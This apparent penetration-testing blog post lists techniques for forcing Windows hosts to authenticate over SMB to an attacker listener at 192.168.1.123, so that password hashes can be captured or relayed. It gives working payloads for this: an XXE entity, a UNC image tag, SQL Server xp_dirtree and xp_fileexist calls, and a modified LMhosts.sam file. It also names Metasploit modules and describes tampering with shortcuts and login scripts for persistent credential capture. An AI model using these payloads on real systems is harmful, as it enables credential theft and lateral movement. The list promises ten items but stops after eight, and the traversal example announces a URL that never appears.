Recently there was a big fuss over the "Redirect to SMB" blog that was released by Brian Wallace. Personally, I think the recent scare over this vulnerability is a little overstated, but it could be a useful way to capture an SMB hash. I was already in the process of putting together this list, so here's a bunch of other ways that you can force a UNC path and capture credentials.
UNC paths are one of my favorite things to use during a pen test. Once I force an account to authenticate to me over SMB, I have two options: capture and crack the hash, or relay the hash on to another computer. Plenty has been written about both options, so we won't cover that here. The methods outlined below should give you some options for where you can use UNC paths to force authentication back to your attacking box. Firewall rules (SMB egress is commonly blocked, so the listener usually needs to sit on the internal network) and file restrictions can really mess up some of these, so your mileage may vary.
For demonstration purposes, we will be using "\\192.168.1.123\test" as our listening UNC path / SMB server.
Here's a linked table, if you want to jump straight to one of these:
- XML External Entity Injection
- Broken IMG Tags
- Directory Traversals
- Database Queries/injections
- File Shares
- Drive Mapping on Login
- Thick Applications
- The LMhosts.sam file
- SharePoint
- ARP spoofing - Ettercap filters
1. XML External Entity Injection
External entity injection can be a really handy way to read files off of a remote system, but if that server happens to be a Windows system, you can use a UNC path. The parser's attempt to fetch the entity is what triggers the SMB authentication, so this works even when the parsed result is never reflected back to you (a blind XXE).
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]>
<foo>&xxe;</foo>
Antti Rantasaari from NetSPI has been doing some really cool work in this space, so check out his blogs for more info.
2. Broken IMG Tags
Using a UNC path for an IMG tag can be pretty useful. Depending on where your SMB listener is (on the internal network) and what browser the victim is using (IE), there's a chance that the browser will just send the hash over automatically. These can also be embedded anywhere that may process HTML (email, thick apps, etc.). Other browsers generally refuse to follow a file or UNC reference from a web page, so this is mostly an IE and intranet-zone trick.
"Internet Explorer's Intranet zone security setting must be set to Automatic logon only in Intranet zone. This is the default setting for Internet Explorer." (Source)
<img src=\\192.168.1.123\test.gif>
3. Directory Traversals
I wrote about this a while back, but web applications that allow you to specify a file path may be vulnerable to UNC path injection. By inputting a UNC path (instead of your typical ..\..\ or C:\ directory traversal), you may be able to capture the credentials for the service account that runs the web application. This gets past the usual traversal filters because a UNC path contains no ..\ sequence and no drive letter; it is simply an absolute path that the Windows file APIs resolve over SMB.
Change the Id parameter in this URL:
4. Database Queries/injections
My co-worker, Scott Sutherland, wrote about using built-in SQL Server procedures to do SMB relay attacks. This one can be really handy if you have databases that allow the "domain users" group to authenticate. It's surprising to see how many database servers are running with domain admin service accounts. Just use the xp_dirtree or xp_fileexist stored procedures and point them at your SMB capture server; the SQL Server service account, not the logged-in database user, is what authenticates to the share.
xp_dirtree '\\192.168.1.123\'
xp_fileexist '\\192.168.1.123\'
There are a bunch more SQL procedures out there that you could potentially use, but these two are pretty reliable. Any time you can read a file in SQL, you can probably use a UNC path in it. The same calls work as stacked queries through a SQL injection point, provided the application's login can execute them.
This attack also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module can do it, and there's a great blog about Oracle SMB relay on the ERPScan blog.
5. File Shares
If you have write access to a file share, you have a couple of options for getting hashes.
- Here's a great one from Mubix: modify the icon path of .lnk shortcut files to a UNC path. Explorer resolves the icon when it renders the directory listing, so anyone who simply browses the share authenticates to you.
- Microsoft Word documents can also be modded with Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC paths into the documents.
6. Drive Mapping on Login
This may be overkill, but it could be handy for persistence. By modding any scripts used to map network drives for users, you can add your own UNC path in as an additional drive to map. This is handy, as any users who have this drive added will send you credentials every time they log in. If you don't have rights to overwrite the startup scripts, GDS Security has a nice blog about setting this up with Metasploit and spoofing the startup script server.
7. Thick Applications
Basically anywhere that you can tell an app to load a file, you can potentially add in a UNC path. We have seen many file upload dialogs in thick applications that allow this. This is even better with hosted thick client applications that are running under the context of a terminal server user (and not the application user). This can also be really handy for kiosk applications. For more thick app breakouts, check out Scott's "Breaking Out!" blog.
8. The LMhosts.sam file
Mubix has a couple of great UNC tricks in his "AT is the new black" presentation. I already called out the .lnk files up above, but by modifying the LMhosts.sam file, you can sneak in a UNC path that forces the user to load a remote hosts file. The #PRE entry preloads the name netspi as our listener's address, so the #INCLUDE line resolves straight to it. Here's a sample LMhosts.sam using our UNC path:
192.168.1.123 netspi #PRE
#BEGIN_ALTERNATE
#INCLUDE \\netspi\test\hosts.txt
#END_ALTERNATE